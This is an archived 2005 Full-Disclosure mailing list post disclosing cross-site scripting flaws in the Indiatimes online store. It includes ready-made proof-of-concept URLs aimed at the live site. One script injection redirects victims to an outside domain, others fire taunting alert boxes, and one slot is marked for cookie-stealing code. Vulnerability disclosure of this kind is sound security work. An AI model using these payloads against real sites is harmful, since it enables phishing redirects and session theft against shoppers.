lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050729211847.649F71418@lists.grok.org.uk> Date: Fri Jul 29 22:19:56 2005 From: mail at hackingspirits.com (Debasis Mohanty) Subject: Indiatimes Shopping Cart XSS (Cross Site Scripting) Attacks Recently, I discovered a major XSS issue with Indiatimes shopping cart. It is one of the largest shopping and auctioning portal in India. The XSS flaw is present in most of the links of the portal however, I am currently reporting only few specific links which are very critical. The vulnerability details are provided below - Vulnerability: Indiatimes Shopping Cart XSS (Cross Site Scripting) Attacks Criticality: High Description: Indiatimes Shopping Cart (http://store.indiatimes.com) can be exploited by any malicious user to conduct cross-site scripting and script insertion attacks. The Input passed to certain parameters in various scripts isn't properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML or script code in a user's browser session in context of an affected site by tricking the user into visiting a malicious website or follow a specially crafted link. Below is the proof-of-concept which explains this - 1. Retrieving Cookies or Executing Malicious Commands Remotely http://store.indiatimes.com/book/PlanetMBookSearch.jsp?keyword=[MALCODE HERE]&search=title&image.x=5&image.y=14 2. Re-directing the site to any malicious or fake site to trap the victim http://store.indiatimes.com/book/PlanetMBookSearch.jsp?keyword=<script>docum ent.location.replace('http://www.hackingspirits.com')</script>&search=title& image.x=5&image.y=14 This can be of great aid to the phishers who can entice the user to click on the above link and get re-directed to some malicious sites where their critical informations can be stolen. 2. Something more annoying http://shopping.indiatimes.com/webapp/commerce/command/ExecMacro/Indiatimes_ Shop/macros/singlemacrosnew/Product.d2w/report?prmenbr=195102&prrfnbr=871074 &parentcat=753736&product_rn=<script>alert('T00%20BAD')</script>&product_rn= <script>alert('I%20AM%20HERE')</script>&product_rn=<script>alert('YEAH%20YOU %20FOOL')</script>&product_rn=<script>alert('HAVE%20YOU%20LOST%20YOUR%20BRAI N')</script>&product_rn=<script>alert('HE%20HE%20HE%20!!!')</script>&product _rn=<script>alert('DO%20A%20FAVOUR%20!!%20GO%20UNPLUG%20UR%20PC%20CABLE')</s cript>&product_rn=<script>alert('OR%20REBOOT%20IT')</script>&product_rn=<scr ipt>alert('LOOSER%20!!')</script> History: Vendor has been notified but there is no response and I guess neither they are going to respond. Cheers, Debasis Mohanty www.hackingspirits.com
Powered by blists - more mailing lists